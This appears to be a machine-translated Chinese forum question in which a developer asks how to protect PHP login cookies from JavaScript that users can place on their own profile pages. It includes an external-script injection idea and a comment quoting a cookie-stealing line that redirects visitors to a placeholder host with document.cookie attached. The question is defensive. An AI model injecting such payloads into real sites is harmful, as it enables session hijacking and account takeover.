我有一個腳本(由我編程),在這個腳本中,訪問者可以註冊並登錄(用戶信息存儲在cookie中)...註冊後,他們可以編輯他們的個人頁面。問題:這個頁面接受javascript代碼和任何人都可以使用document.cookie獲得cookie:(如何在用戶頁面上保護我的PHP Cookie不受JavaScript影響?
我嘗試創建正則表達式來清理用戶頁面中的document.cookie標記,但它不是很好的解決方案,因爲用戶可以將:<script src="filejs.js"></script>
並寫入filejs .js例如此代碼alert(document.cookie);
,此代碼將找不到清除....
會話保存但它不是很長時間保存(time()+60*24*300
):(
謝謝。
是的,但他們可以把聊天框不保存,例如你在這樣的聊天中寫新消息: document.location =「http://yoursite.com/index.php?cookie="+document.cookie ; 用戶cookie插入您的網站,您可以訪問他的帳戶:s –